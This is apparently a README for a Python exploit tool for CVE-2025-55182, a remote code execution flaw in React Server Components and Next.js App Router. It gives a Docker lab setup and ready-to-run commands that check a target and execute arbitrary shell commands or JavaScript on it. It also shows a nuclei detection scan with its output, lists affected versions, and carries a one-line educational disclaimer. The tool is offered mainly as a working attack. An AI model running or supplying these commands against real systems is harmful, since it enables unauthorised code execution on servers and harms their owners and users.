Share
## https://sploitus.com/exploit?id=373E225E-1A90-5BBF-930A-FEC9ACF3D61A
# CVE-2025-55182 - React Server Components RCE Exploit
Python CLI exploit for CVE-2025-55182, a critical RCE vulnerability in React Server Components via `react-server-dom-webpack`.
**Based on:** [ejpir/CVE-2025-55182-poc](https://github.com/ejpir/CVE-2025-55182-poc)
## Quick Start
### Docker Testing
```bash
# Build and run vulnerable container
docker build -t cve-2025-55182-vuln .
docker run -d -p 3002:3002 --name cve-2025-55182 cve-2025-55182-vuln
sleep 3
# Check vulnerability
python3 exploit.py CVE-2025-55182 --ip localhost --port 3002 --check
# Execute commands
python3 exploit.py CVE-2025-55182 --ip localhost --port 3002 --cmd "id"
python3 exploit.py CVE-2025-55182 --ip localhost --port 3002 --cmd "whoami"
# Cleanup
docker stop cve-2025-55182 && docker rm cve-2025-55182
```
## Usage
```bash
# Check vulnerability
python3 exploit.py CVE-2025-55182 --ip TARGET --port 3002 --check
# Execute command
python3 exploit.py CVE-2025-55182 --ip TARGET --port 3002 --cmd "COMMAND"
# Execute JavaScript
python3 exploit.py CVE-2025-55182 --url http://TARGET:3002 --code "Math.PI * 2"
```
## Checker with nuclei (no RCE, only with Math.PI)
```bash
# Check vulnerability
nuclei -t cve-2025-55182.yaml -u http://localhost:3005
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (outdated)
[INF] Current nuclei-templates version: v10.3.4 (latest)
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://localhost:3005/formaction
[INF] Scan completed in 14.991675ms. 1 matches found.
```
## Affected Versions
- `react-server-dom-webpack`: 19.0.0, 19.1.0, 19.1.1, 19.2.0
- `Next.js`: 15.x, 16.x (App Router)
## Disclaimer
**FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY**